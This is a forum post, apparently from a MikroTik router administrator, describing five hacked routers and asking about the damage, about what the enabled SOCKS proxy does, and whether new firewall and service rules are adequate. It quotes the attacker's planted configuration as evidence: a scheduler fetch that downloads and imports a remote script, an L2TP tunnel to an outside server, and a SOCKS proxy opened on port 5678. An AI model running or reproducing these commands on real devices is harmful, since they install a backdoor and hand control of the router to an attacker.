that work for ~ 5 years (and even more) without any problems
today I have try to enter 5 of them and couldn't enter using winbox\api\ftp
when I enter I saw this in the /system scheduler
/tool fetch url=http://zancetom.com/poll/afb843ea-4472-46b7-a1d0-acd9ecebaf1f mode=http dst-path=7wmp0b4s.rsc /import 7wmp0b4s.rsc
/interface l2tp-client add name=lvpn keepalive-timeout=60 user=user5388942 password=pass5388942 connect-to=s88.leappoach.info disabled=no profile=default
/ip socks set enabled=yes port=5678 /ip firewall filter add action=accept chain=input dst-port=5678 log-prefix="" protocol=tcp /interface l2tp-client add connect-to=s88.leappoach.info disabled=no name=lvpn password=pass5388942 \ profile=default user=user538894
I have check and the IP the connection is coming from is 198.18.0.1
I have remove all the setting and check there are no new surprises (there are not so many setting in the router - so it's easy for me to see the if there are setting I don't know)
this is what I have added in the firewall filter \ IP service:
/ip firewall filter add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=10.0.0.0/24 add action=accept chain=input dst-port=21,22,8728,8291 log-prefix="" protocol=tcp src-address=172.16.0.0/16 add action=drop chain=input log-prefix="" protocol=tcp /ip service set telnet disabled=yes set ftp address=10.0.0.0/24,172.16.0.0/16 set www address=10.0.0.0/24 disabled=yes set ssh address=10.0.0.0/24,172.16.0.0/16 set api address=10.0.0.0/24,172.16.0.0/16 set winbox address=10.0.0.0/24,172.16.0.0/16 set api-ssl disabled=yes
1. what is the damage I'm facing?
2. what does "socks" do? where does it have access to ?
3. is the firewall\service rules I have added are good ?